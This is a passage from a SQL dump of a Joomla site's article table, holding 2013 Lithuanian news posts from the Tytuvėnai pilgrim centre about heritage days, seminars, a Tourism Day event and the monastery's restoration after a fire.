00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,178,'','',1,3997,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',14,'*',''),(125,209,'Europos paveldo dienos 2013 \"Epochų ženklai\"','europos-paveldo-dienos-2013-qepoch-enklaiq','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/europos_paveldo_dienos/europos_paveldo_dienos.jpg\" border=\"0\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\"><img src=\"images/stories/naujienos/europos_paveldo_dienos/europos_paveldo_dienos_logo.jpg\" border=\"0\" style=\"border: 0;\" />\n<p>Kelmės rajono savivaldybė, Tytuvėnų piligrimų centras, Kelmės krašto muziejus ir Kražių kultūros centras kviečia:</p>\n<p><strong>EUROPOS PAVELDO DIENOS KELMĖS RAJONE 2013 „EPOCHŲ ŽENKLAI“</strong><br /><br /></p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">2013 metais Europos paveldo dienų Lietuvoje tema yra „Epochų ženklai“. Ja siekiame atkreipti dėmesį į 1863 m. sukilimo, Žemaitijos krikšto bei kitų svarbių istorinių įvykių pėdsakus, atsispindinčius įvairiuose kultūros paveldo objektuose: dvaruose, istoriniuose parkuose, bažnyčiose, medinėje architektūroje bei daugelyje kitų tiek nekilnojamųjų, tiek kilnojamųjų kultūros paveldo vertybių. Įasmenintus epochų ženklus perskaityti galime istorinių asmenybių biografijose, leidžiančiose geriau suprasti laikmečio įtaką žmonių gyvenimui ir įvertinti nematerialų palikimą, per kartų kartas perduotą iki šių dienų.</p>\n<p style=\"text-align: center; text-indent: 1cm;\"><strong>RENGINIO PROGRAMA</strong></p>\n<p style=\"text-align: center; text-indent: 1cm;\">2013 M. RUGSĖJO 12 D.</p>\n<p style=\"text-align: center; text-indent: 1cm;\">KELMĖS DVARO SODYBA</p>\n<p style=\"text-align: center; text-indent: 1cm;\">14.00 „Istoriniai Kelmės krašto paminklai - mūsų praeities liudininkai“. Popietė su senjorų bendruomene</p>\n<p style=\"text-align: center; text-indent: 1cm;\">2013 M. RUGSĖJO 13 D.</p>\n<p style=\"text-align: center; text-indent: 1cm;\">TYTUVĖNŲ BAŽNYČIOS IR VIENUOLYNO ANSAMBLIO REFEKTORINĖ SALĖ</p>\n<p style=\"text-align: center; text-indent: 1cm;\">13:00 val. Renginio atidarymas, parodos pristatymas</p>\n<p style=\"text-align: center; text-indent: 1cm;\">13:30 val. Tytuvėnų bažnyčios ir vienuolyno ansamblio epochų ženklai. Pristato Tytuvėnų piligrimų centro gidė Rūta Krencienė</p>\n<p style=\"text-align: center; text-indent: 1cm;\">13:45 val. 1863 m. sukilimo istoriniai pėdsakai Kelmės krašte. Pristato Kelmės krašto muziejaus muziejininkas Rimantas Serva</p>\n<p style=\"text-align: center; text-indent: 1cm;\">14:00 val. Žemaitijos krikšto 600 metų jubiliejus. Pristato Kražių kultūros centro muziejaus vedėjas Vygantas Mažonas</p>\n<p style=\"text-align: center; text-indent: 1cm;\">14:15 val. Šiaulių styginių kvarteto klasikinės muzikos koncertas</p>\n<p style=\"text-align: center; text-indent: 1cm;\">15:00 val. Edukacinė programa „19 amžiaus raštas“<br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p><img src=\"images/stories/naujienos/europos_paveldo_dienos/europos_paveldo_dienos_logo1.jpg\" border=\"0\" style=\"border: 0;\" /></p>',1,0,0,44,'2013-09-10 07:26:17',135,'','2013-09-10 07:37:28',135,0,'0000-00-00 00:00:00','2013-09-10 07:26:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',5,0,182,'','',1,4108,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',18,'*',''),(126,210,'Kvietimas į seminarą','kvietimas-seminar','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/kvietimas_lidija.jpg\" border=\"0\" width=\"200\" height=\"133\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Seminaras - nemokamas!<br /><br />Kviečiame š.m. spalio 1 d. 1800 val. Tytuvėnų vienuolyno refektorinėje salėje sudalyvauti seminare „Laimingi kasdien be priežasties“. Seminaro metu bus aptariamos temos: 1. Pasirinkimas; 2. Pozityvus mąstymas; 3. „Tebūnie tau pagal tavo tikėjimą\"; 4. Tikslo turėjimas ir siekimas; 5. Meilė sau; 6. Sielos šnaresys; 7. Atleidimas; 8. Dėkingumas; 9. Dalijimasis.<br /><br /><br /></p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">Kam skirtas šis seminaras:</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Jei tu manai, kad likimas yra žmogui duotas, kaip kažkieno sukurta programa, o žmogus yra per mažas ir per menkas, kad galėtų šią programą keisti, tuomet šis seminaras tikrai ne tau.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Tačiau, jei tu tiki, kad „kiekvienas yra savo laimės kalvis“, bet nemoki, nežinai, kaip tą laimę „nusikalti“, tuomet ateik, sudalyvauk seminare ir sužinok. Gausite daug naudingos, realiame gyvenime pritaikytos ir patikrintos informacijos bei technikas, kurių pagalba galėsite palaipsniui keisti savo gyvenimą norima linkme.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\"><strong>Norinčius dalyvauti seminare, prašome užsiregistruoti iš anksto Všį \"Tytuvėnų piligrimų centre\" telefonu +370 427 56223 arba el. paštu: info@tytuvenai.eu</strong></p>\n<p style=\"text-align: justify; text-indent: 1cm;\"><strong>Visiems seminaro dalyviams dovanosime autorės Lidijos Mačiūnienės elektroninę knygą \"Laimingi kasdien be priežasties\".</strong></p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p style=\"text-align: center;\"> </p>\n<p> </p>',1,0,0,44,'2013-09-24 12:11:38',135,'','2013-09-24 12:15:53',135,0,'0000-00-00 00:00:00','2013-09-24 12:11:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,181,'','',1,4146,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',17,'*',''),(127,211,'Turizmo dienos paminėjimas','turizmo-dienos-paminjimas','','<p class=\"MsoNormal\">Tytuvėnų piligrimų centras kviečia visus sudalyvauti Turizmo dienos paminėjime penktadienį.</p>\n<p class=\"MsoNormal\">Renginys nemokamas, o edukacinė programa vyks visą dieną.</p>\n<p style=\"text-align: left;\">Maloniai visus kviečiame užsukti Jums patogiu metu!</p>\n<p style=\"text-align: left;\"><img src=\"images/stories/tpc tur.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-09-25 13:00:15',135,'','2013-10-09 08:33:41',135,0,'0000-00-00 00:00:00','2013-09-25 13:00:15','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',10,0,180,'','',1,3800,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',16,'*',''),(128,212,'Konkursas mažiesiems ir jų tėveliams','molig-konkursas','','<p><img src=\"images/stories/moligu svent skelbimas-1-page-001.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-10-16 10:37:49',135,'','2013-10-16 10:44:32',135,0,'0000-00-00 00:00:00','2013-10-16 10:37:49','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,175,'','',1,3609,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',11,'*',''),(129,213,'Paminėta pasaulinė turizmo diena','paminta-pasaulin-turizmo-diena','','<p>VšĮ ,,Tytuvėnų piligrimų centras‘‘ š.m. rugsėjo 27 d. kvietė visus į Tytuvėnų Bernardinų vienuolyną kartu paminėti pasaulinę turizmo dieną.</p>\n<p class=\"MsoNormal\">Visi norintys galėjo apžiūrėti Gasparo Aleksos fotografijų parodą ,,2012 m. kelionės į Šventąją Žemę‘‘ ir susiverti piligrimo rožinį.</p>\n<p class=\"MsoNormal\">Pirmieji Tytuvėnų Bernardinų vienuolyne apsilankė vaikai kartu su tikybos mokytoja Regina Vaičiuliene. VšĮ ,,Tytuvėnų piligrimų centras‘‘ gidė – vadybininkė Rūta Krencienė papasakojo visiems susirinkusiems apie turizmą, piligrimines keliones, maldos vėrinius kitose pasaulio religijose. Visi norintys patys galėjo susiverti piligrimo rožinį.</p>\n<p class=\"MsoNormal\">Vėliau vyresnieji vaikai turėjo garbės susipažinti su fotografijų parodos autoriumi Gasparu Aleksa , kuris papasakojo apie piligriminę kelionę į Šventąją Žemę.</p>\n<p class=\"MsoNormal\">Kas tai yra piligriminė kelionė? ,,Piligriminės kelionės metu yra lankomos šventos vietos, šventose vietose skaitomas Šventasis raštas, Naujasis testamentas, kiekvieną dieną aukojamos šventos mišios, kalbamos rožyno maldos. Šventoji žemė- Jeruzalė labai sudėtingas kraštas. Jeruzalė sudalinta į tris sektorius A, B, ir C. A sektoriuje gyvena žydų tautybės žmonės, B sektoriuje musulmonai , žydai ir C sektoriuje – musulmonai. Šitame krašte labai daug žmonių ir  labai daug piligrimų,, pasakojo Gasparas Aleksa.</p>\n<p class=\"MsoNormal\">Vaikams buvo įdomu ir naudinga pasiklausyti  apie Jėzaus gyvenimą, kuris susideda iš trijų epizodų.  Metai kai Jėzus  gimė, dirbo, meldėsi ir apie tris metus kai pradėjo skelbti dangaus karalystę ir pasireiškė kaip Dievo sūnus, ir  kančios savaitė, kada Jėzus buvo išduotas, kankinamas, nukryžiuotas, miręs ir prisikėlęs.</p>\n<p class=\"MsoNormal\">Tariame nuoširdų ačiū ponui Gasparui Aleksai už įdomų pasakojimą ir nuostabią fotografijos parodą iš Šventosios Žemės.</p>\n<p>Parengė VšĮ ,,Tytuvėnų piligrimų centras‘‘ administratorė Sandra Sabaliauskienė.</p>\n<p class=\"MsoNormal\"><img src=\"images/stories/1.jpg\" border=\"0\" /> <img src=\"images/stories/2.jpg\" border=\"0\" /> <img src=\"images/stories/3.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-09-30 12:24:39',135,'','2013-09-30 12:34:55',135,0,'0000-00-00 00:00:00','2013-09-30 12:24:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,179,'','',1,4042,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',15,'*',''),(130,214,'Kviečiame į darbų saugos seminarą','kvieiame--darb-saugos-seminar','','<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: center;\" align=\"center\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">UAB „Verslo Aljansas“  įgyvendindami savo misiją, ugdyti ir puoselėti saugaus darbo sampratą, kultūrą bei tradicijas, tęsdami švietėjišką darbą, organizuoja nemokamų seminarų ciklus aktualiomis darbuotojų saugos ir sveikatos temomis.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: center;\" align=\"center\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">2013 lapkričio 19 dieną 10 val. Tytuvėnų Piligrimų centre organizuojamas nemokamas seminaras</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: center;\" align=\"center\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">KVIETIMAS Į SEMINARĄ</span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"></span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: center;\" align=\"center\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">PRIVALOMASIS DARBO SAUGOS BŪKLĖS ĮMONĖJE</span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"></span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: center;\" align=\"center\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">ELEKTRONINIS DEKLARAVIMAS</span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"></span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span></strong><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Aktualumas</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">2013 spalio 1 d.</span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> įsigalioja Informacijos apie darbuotojų saugos būklę ir darbo vietų atitiktį darbuotojų saugos ir sveikatos norminių teisės aktų reikalavimams teikimo (toliau - deklaravimo) Valstybinei darbo inspekcijai tvarkos aprašas, kuriame nustatyta, kad <strong><span style=\"text-decoration: underline;\">visi ūkio subjektai</span></strong><span style=\"text-decoration: underline;\"> <strong>iki 2013 m. gruodžio 31 d. privalo pateikti</strong></span><strong> informaciją apie darbuotojų saugos būklę</strong> <strong>ir darbo vietų atitiktį darbuotojų saugos ir sveikatos norminių teisės aktų reikalavimams</strong> <strong>Valstybinei darbo inspekcijai</strong>.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span></strong><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaras skirtas</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Įmonių vadovams, darbuotojų saugos ir sveikatos tarnybos specialistams, darbdavio įgaliotiems asmenims saugai ir sveikatai.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro tikslas</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Supažindinti seminaro dalyvius su deklaravimo tvarka bei įvairių ūkinės veiklos sričių įmonių deklaravimo ypatumais.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro programa:</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">1.    Teisinis deklaravimo pagrindimas;</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">2.    Deklaravimo esmė, ekonominė nauda, atsakomybė už pateiktų duomenų teisingumą;</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">3.    Kas ir kaip turi būti deklaruojama;</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">4.    Profesinės rizikos vertinimas, darbuotojų vaidmuo profesinės rizikos vertinimo procese.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro pranešėjai</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">UAB „Verslo Aljansas“ darbuotojų saugos ir sveikatos centro specialistai</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro data                                   - 2013 m. lapkričio 19 d., 10 <sup>00 </sup>val.</span></strong></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro trukmė </span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">- 3 akademinės valandos</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro dalyvio mokestis </span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">- seminaras nemokamas</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Seminaro vieta </span></strong><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Maironio g. 2A, Tytuvėnų m., Kelmės r. sav. </span><span style=\"font-family: \'Times New Roman\', serif; font-size: 12pt; line-height: 115%;\">(Tytuvėnų Piligrimų centro refektorinėje salėje)</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\"> </span><span style=\"font-family: \'Times New Roman\', serif; font-size: 12pt; line-height: 115%;\">Dalyviams bus išduoti seminaro pažymėjimai.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">Vietų skaičius ribotas, būtina išankstinė registracija.</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-family: \'Times New Roman\', serif; font-size: 12pt; line-height: 115%;\">Registruotis: tel. (8 427) 56223, faksas (8 427) 56223</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">El.paštu: info</span><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;; mso-ansi-language: EN-US;\" lang=\"EN-US\">@tytuvenai.eu</span><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">;</span></p>\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt; text-align: justify;\"><span style=\"font-size: 12pt; line-height: 115%; font-family: \'Times New Roman\', serif;\">Dėl išsamesnės informacijos kreipkitės: UAB „Verslo Aljansas“ Tauragės skyriaus administratorė Jolita Andrulaitienė,  tel. (8 620) 22971 </span><a href=\"http://www.versloaljansas.lt/\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;\">www.versloaljansas.lt</span></a></p>','',1,0,0,44,'2013-10-09 07:34:22',135,'','0000-00-00 00:00:00',135,0,'0000-00-00 00:00:00','2013-10-09 07:34:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',1,0,177,'','',1,4228,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',13,'*',''),(131,215,'Tęsiasi Tytuvėnų ansamblio atstatymo darbai','tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai','','<p class=\"MsoNormal\">Tytuvėnų piligrimų centras toliau tęsia vienuolyno atstatymo po gaisro darbus. Tytuvėnų vienuolyne sudėti nauji langai. Gaisro metu jie buvo visiškai sudegę. Toliau dengiamas bažnyčios stogas. Labai smagu, kad Tytuvėnų miestelio puošmena, bažnyčios ir vienuolyno ansamblis, gražėja kiekvieną dieną.</p>\n<p>Galerija:</p>\n<p><img src=\"images/stories/dsc07241.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07249.jpg\" border=\"0\" /></p>\n<p><span style=\"background-color: #ffffff; color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;\"><img src=\"images/stories/dsc07168.jpg\" border=\"0\" /></span></p>\n<p><span style=\"background-color: #ffffff; color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;\"><img src=\"images/stories/dsc07166.jpg\" border=\"0\" /></span></p>\n<p><span style=\"background-color: #ffffff; color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;\"><img src=\"images/stories/dsc07164.jpg\" border=\"0\" /><br /></span></p>','',1,0,0,44,'2013-10-09 08:07:29',135,'','2013-10-13 12:15:49',135,0,'0000-00-00 00:00:00','2013-10-09 08:07:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,176,'','',1,3782,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',12,'*',''),(132,216,'Tytuvėnų ansamblio bažnyčios stogo keitimo darbai','tytuvn-ansamblio-banyios-stogo-keitimo-darbai','','<p>Toliau sparčiai vyksta Tytuvėnų bažnyčios stogo keitimo darbai. Ruošiamasi keisti bažnyčios bokštų stogo dangą.</p>\n<p>Nuotraukų galerija:</p>\n<p><img 